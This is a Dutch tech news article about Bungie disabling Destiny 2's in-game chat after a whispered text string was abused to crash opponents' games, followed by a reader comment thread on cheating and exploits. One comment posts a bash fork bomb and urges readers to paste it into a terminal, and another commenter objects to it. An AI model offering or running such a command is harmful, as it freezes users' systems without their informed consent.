Bungie schakelt chat in Destiny 2 tijdelijk uit na actief misbruikte exploit

Bungie heeft de ingamechat van Destiny 2 tijdelijk helemaal uitgeschakeld nadat er een exploit bleek te zijn om de game van tegenstanders te laten crashen. Het uitschakelen van de chatfunctie geldt voor alle platformen en de ontwikkelaar werkt aan een oplossing.

Door middel van het versturen van een specifieke text konden spelers elkaars game tijdens pvp-potjes laten crashen, zo detailleert PC Gamer. De text werd via de whisper-functie naar specifieke spelers gestuurd, waarna het spel voor het doelwit crashte door een foutmelding. De exploit werd onder meer door een onofficieel Destiny-twitterkanaal gereproduceerd. Op deze manier konden kwaadwillende Destiny 2-spelers geforceerd van de tegenstander winnen gezien die laatste niet meer aanwezig was.

Bungie heeft daarom dit weekend voor alle platformen alle beschikbare vormen van de in-game chat uitgeschakeld. Dat wil zeggen dat de algehele chat, fireteam chat, lokale chat, teamchat en whispers tijdelijk niet meer mogelijk zijn. Vooralsnog is niet duidelijk hoelang de chatfunctie uitgeschakeld blijft. Bungie heeft op 1 augustus een onderhoudsupdate gepland, maar het is niet bekend of de exploit hiermee verholpen moet worden.

Destiny 2 pvp

Door Yannick Spinner

Redacteur

01-08-2022 • 18:54

34

Reacties (34)

34
32
13
0
0
7
Wijzig sortering
Hoe ontdek je zoiets?
Het lijkt erop dat dit met toeval ontdekt is. In het filmpje dat gedeeld is op Twitter sturen ze een simpele url: https://www.netlimiter.com/products/nl4
":(){ :|:& };:"


Gooi dat zonder de " maar eens in een cmd en druk op enter

*Proceed at your own risk

[Reactie gewijzigd door nullbyte op 30 juli 2024 09:29]

Waarom reageer je op de vraag met een fork bomb? Wat heeft dit te maken met het artikel of de vraag? Btw, wil je er ook even de link naar tekst en uitleg bij geven zodat mensen iets bewuster om kunnen gaan met dit? De proceed at your own risk clausule doet imo niet genoeg, people be stupid:p

Naar verluid bestaat de tekst die in destiny 2 chat gegooid wordt uit een string met meer dan 200 karakters met daarin veel Chinese karakters. Het idee is dat, omdat deze karakters in unicode codering meer bytes innemen dan westerse karakters, het geheugengebruik van dit bericht een memory overflow veroorzaakt die de applicatie crashed.

Hoe je zoiets ontdekt? Toeval en of uitproberen zijn de voornaamste redenen voor dit soort ontdekkingen. We zijn gewoon met heel veel mensen in een applicatie bezig en met elke extra persoon die aan alles zit (en het niet altijd gebruikt zoals het bedoeld is) wordt de kans groter dat iemand dit soort foutjes ontdekt. De uitleg van zulke bugs hoeft niet altijd accuraat te zijn al zijn er mensen die ver gaan om de exploit/bug te analyseren en er een correcte verklaring aan te geven. Vooral in de speedrunning scene wordt dit gedaan omdat een exploit soms anders werkt dan vermoed en daardoor niet maximaal benut wordt of goed gebruik gemaakt kan worden van de toepasbaarheid in verschillende scenario's.

Uiteraard zijn er een aantal genres waarin er actief gezocht wordt naar specifieke exploitaties waardoor deze in die genres vaker kunnen voorkomen dan in andere genres; in competatieve games en genres vind je vaak exploitaties om een upperhand te krijgen (wallhack, inf ammo, inf hp, aimbot) terwijl "Out of bounds" bijvoorbeeld een vaak gezochte (en gevonden!) exploit is voor games waar any% speedrunners actief zijn omdat dit voor hun veel waardevoller is dan bijvoorbeeld inf hp exploitaties.

Edit: verduidelijking en spellingcheck.

[Reactie gewijzigd door jackyallstar op 30 juli 2024 09:29]

'common practice', het is niet de eerste keer, zeker niet de laatste keer, dat het versturen van bepaalde tekst een crash/error/fail geeft. Dus heb je altijd mensen die wat proberen, altijd mensen die iets testen, tot je ergens een combinatie vind (veelal 'exotische' tekens) die dus genoeg is.
De een doet het om te trollen/treiteren, de ander doet het om daadwerkelijk voordeel te behalen. In de teamsport zie je dat net zo goed: spelers proberen vaak bergen te verzetten in de hoop dat een ander straf krijgt of jij jouw straf ontloopt. Dat is echt niets nieuws onder de zon en zie je letterlijk overal.
Zo zo, een hoop minnetjes. Heb ik een gevoelige snaar geraakt van de valsspelers en exploit misbruikers?
Nee, maar jouw bericht is wel behoorlijk generaliserend, net als deze zin, overigens. Bedoel, zou ik jouw post iets verbouwen, krijg je bijvoorbeeld dit:
Voetballers die van alles proberen en altijd testen zijn naar mijn mening diep triest en levenloos. Wat gaat er eigenlijk in hen om, om met een schwalbe vervolgens spelers een rode kaart te laten krijgen (als ze aan het verliezen zijn)? Voetballen doe je om er plezier in te hebben, ongeacht of je nou verliest of wint. Maar blijkbaar is het voor sommigen enorm belangrijk om hun ego te strelen of zo.
Die ene speler minder, kan (als je bijvoorbeeld aan het verliezen bent) het verschil maken in strategie waardoor je uiteindelijk wel wint en dan bijvoorbeeld kampioen wordt, promoveert of wat dan ook. ;) Niet dat ik een en ander wil goed praten, maar in een andere context wordt er vaak wel opeens anders er naar gekeken. ;)

[Reactie gewijzigd door CH4OS op 30 juli 2024 09:29]

Mijn bericht mag dan wel behoorlijk generaliserend zijn maar neemt niet weg dat het spelervaring voor velen behoorlijk verzieken. Zo hebben bijvoorbeeld veel van mijn GTA vrienden GTAO opgegeven omdat er teveel valsspelers / exploit misbruikers hun spel laten crashen en of uit een adversary modes kicken omdat de tegenstanders bijvoorbeeld aan het verliezen zijn. Ik maak het zelf ook vaak mee dat mijn spel wordt gecrasht en eruit wordt gekicked naar storymode.
Mijn bericht mag dan wel behoorlijk generaliserend zijn maar neemt niet weg dat het spelervaring voor velen behoorlijk verzieken.
Ik had het erover dat hegeen ik citeerde behoorlijk generaliserend is. Alsof iedereen die jou een -1 moderatie geven dit soort dingen doen. Dat is simpelweg niet waar. ;)
Zo hebben bijvoorbeeld veel van mijn GTA vrienden GTAO opgegeven omdat er teveel valsspelers / exploit misbruikers hun spel laten crashen en of uit een adversary modes kicken omdat de tegenstanders bijvoorbeeld aan het verliezen zijn. Ik maak het zelf ook vaak mee dat mijn spel wordt gecrasht en eruit wordt gekicked naar storymode.
Ja, het gebeurd overal, maar niet alleen bij het spelen van games dus. In de sport gebeurd het evengoed. ;)
In tijde van Battlefield Vietnam speelde ik veel online, en was nog behoorlijk goed ook. En dan zag je vaak mensen van team switchen om mij via team kill neer te halen omdat het via de normale weg niet lukte.

[Reactie gewijzigd door Bulls op 30 juli 2024 09:29]

Helaas, ik denk dat gamen steeds minder en minder gaat om plezier.

Het begint als plezier, tot je verder in het spel komt en je tegen bepaalde muren aanloopt. Je level is niet hoog genoeg, je uitrusting niet sterk genoeg of je statistieken niet hoog genoeg.
Als mens ga je dan vaak proberen dat probleem op te lossen, vaak kan dat door:
1) Geld
2) Tijd
3) Vaardigheid

In Destiny 2 heb je iets als Trials of Osiris dat voor de topspelers weggelegd is. Het doel is om 7/8 potjes te winnen, en wanneer je tweemaal verloren hebt moet je helemaal opnieuw beginnen.
Als je wint krijg je toegang tot de beste wapens in het spel.

Door je concurrentie te laten crashen bespaar je op tijd en heb je geen/weinig vaardigheid meer nodig. Dit resulteert in het jou bereiken van je doel (beste wapens krijgen) en dat resulteert in het krijgen van 'plezier'.

(Overigens is voor veel mensen ego strelen ook gelijk aan plezier).
Jeetje, sommigen nemen spellen serieus op een ongekend niveau dan.
True. Helaas developers ook, daarom
gaan de games waar het meeste geld in om gaat al lang niet meer om het maken van een leuke game.

Gelukkig maar dat sommige developers en publishers nog wel mooie (meestal dan ook sp) games durven uit te geven. Hoewel daar vaak ook een onderliggende rede voor is, want wat is Sony en waarom zou je een PlayStation willen als ze niet de mooie exclusives te bieden hebben? Gewoon een dure marketingbeslissing om dat soort games te blijven maken.
Tja, dat kun je van allerlei dingen zeggen. Mensen die meedoen met autoraces, nemen auto's op een ongekend niveau, mensen die treinen spotten, nemen treinen treinen op een ongekend niveau, enz. Dus ja, er zijn ook mensen die serieus spellen spelen. Ook (ouderwetse) bordspellen, overigens, want er bestaan bordspelverenigingen en -clubjes. ;)
Je zit op tweakers en schrijft:

"Mensen die van alles proberen en altijd testen zijn naar mijn mening diep triest en levenloos."

Volgens mij zit je op de verkeerde website. Want je vindt ons blijkbaar maar triest en levenloos.

Als er een paar miljoen mensen gewoon gebruik maken van de chats is het een kwestie van tijd voordat dit soort exploits gevonden worden. Iemand vertelt het aan een vriend of laat het op een forum zien en het gaat zo de wereld over.

Het begint vaak helemaal niet met de intentie om te cheaten.
Gamen voor plezier? Echt niet meer. Moet je maar ns kijken hoe de minecraft community veranderd is over de jaren bijv. En drag clicking. Multiplayer gamen gaat tegenwoordig alleen maar om winnen boeit niet hoe en of het leuk is als je maar wint.
Dan is multiplayer gaming dus toxic geworden zo te lezen, klopt dat? Ik speel zelf alleen GTA/O dus daar zijn zowel toxic als goede spelers die niemand wat aandoet. En minecraft gaat niet meer om bouwen/minen?
Moet je maar ns voor de gein drag clicking op youtube opzoeken.
Begrijp me goed, geen Minecraft speler, noch gebruik makend van drag clicking waar dan ook, maar de 2e suggestie heeft als titel "How to drag click on any mouse" (en de rest van de titels suggereren dat er mogelijkerwijs sommige muizen zich er beter voor lenen dan anderen). Het klinkt als een techniek die je kan toepassen op een controllerend medium (controller, muis, toetsenbord, etc). Als spellen dat toelaten zonder enige vorm van hacks, hoe valt dat dan onder het kopje valsspelen?

Vroeger speelde ik Quake en kon je zelfs script matig dingen afdwingen, maar zelfs zonder dat soort scriptjes kon je dingen doen als "bunny hopping" (door te draaien en springen tegelijk kon je verder springen, door te "zigzaggend" te springen kon je sneller verplaatsen dan gewoon rennen zeg maar) of rocketjumping (door gebruik te maken van de uitgaande shockwave van een explosie, bijvoorbeeld onder je of schuin naast je in combinatie met springen omdat je _zelf_ een raket schoot, kon je heel ver en/of hoog springen ten koste van schade). Cheaten? Nee, 'onvoorziene' gevolgen/mogelijkheden van de 'natuurwetten' van een specifieke game en daar gebruik van maken.

Ik snap dat in een spel zoals Minecraft, waar een click X blokjes oplevert de speler die een hogere click per minute kan bewerkstelligen in het voordeel is (want meer materiaal, dus sneller bouwen oid?), maar is het dan niet een kwestie van die techniek eigen maken? Wat maakt dit dus valsspelen?

En hoe sta je dan bijvoorbeeld tegenover dat je ook custom made controllers hebt, Scuff controllers bijvoorbeeld, die extra toetsen hebben om bepaalde handelingen te vergemakkelijken (of dat je kan blijven aimen en springen tegelijk vanwege backpaddels oid)? Is dat ook cheaten?

[Reactie gewijzigd door GRDavies75 op 30 juli 2024 09:29]

Ligt maar net aan de server waar je inzit
De competitive gamemodes zijn wel zwaar sweatty en toxic geworden.
Vroeger kon je dat gewoon leuk spelen zonder sweats.
Mensen die van alles proberen en altijd testen zijn naar mijn mening diep triest en levenloos.
Thanks he.
Zo zo, een hoop minnetjes. Heb ik een gevoelige snaar geraakt van de valsspelers en exploit misbruikers?
Nee die denk ik niet, maar je statement treft ook een volledig werkveld in de IT. Beetje generiek zo.
Heb je je ooit bedacht dat er mensen zijn die een spel leuk vinden en daarom dus van alles proberen om het uiteindelijk nog beter te maken?
Daar naast zijn er mensen die er vervolgens misbruik van gaan maken, die zijn diep triest ja.
Als je het iets anders verwoord had, had dat een hoop minnetjes gescheeld denk ik.
Mensen die van alles proberen en altijd testen zijn naar mijn mening diep triest en levenloos.
Zonder die mensen zouden toch heel veel problemen en exploits niet gedetecteerd zijn. Professionele hackers zijn ook mensen die "van alles proberen" op een systeem, zodat een client de boel kan fixen.

Ik heb zelf ook wel eens wat geprobeerd in games en vervolgens netjes aan de developers gemeld. Die hadden een aantal exploits in hun open beta; een open, onbeveiligde poort in hun xmpp-chatserver waarmee je andere gebruikers kon overnemen en muten, en een beveiligingslek in de loginserver waarmee je je eigen character data kon meesturen tijdens het inloggen. (effectief dus welk level/stats je maar wilt zijn die sessie)
Wat verpest dit precies?
De rust en het gehoor van iedereen in de wijde omgeving.
offtopic:
De specificaties van de auto of motor waarop de typegoedkeuring is afgegeven. Als daardoor bepaalde waardes veranderen, zoals CO2 uitstoot of motorvermogen, ontduik je de regels voor BPM of rijbewijs categoriën.
Tjonge,
Ik ben zelf actief op Destiny 2, en was al behoorlijk verstoord door het inactief zijn van de chat. Het is nu heel lastig om mensen bij elkaar te krijgen, bijvoorbeeld van je Clan (via clanchat).

Discord etc werkt wel, maar dat gebruiken we pas nadat we elkaar gevonden hebben via chat.

Ik hoop dus dat ze dit snel repareren. Het klinkt als eenzelfde probleem dat er was met log4j: het gebruiken van de chat voor game-instructies ipv alleen chat.
Interessant dat zo'n "grote" exploit zo laat in de game's leven gevonden wordt... Vraag me af of dit al vanaf release erbij zit of pas na een recente update.

Toch bijzonder dat mensen achter zo'n exploit komen, zijn er dan spelers die gewoon allerlei random strings naar andere versturen en wanneer die speler opeens offline gaat denken, oh ik heb er een? Of hoe zou dat werken?
Zo'n probleem had Oldschool RuneScape ook jaren geleden, bij het verzenden van een µ teken crashte dichtbij zijnde spelers, uiteraard misbruikt in PvP.
In en in triest dat zoiets uberhaupt speelt bij "gamers" om hier vanaf te weten laat staan te gebruiken.
Daarom dus gewoon lekker single player indie games. Stuk minder gezeur!
Zoeits was ook mogelijk in New World haha.

Op dit item kan niet meer gereageerd worden.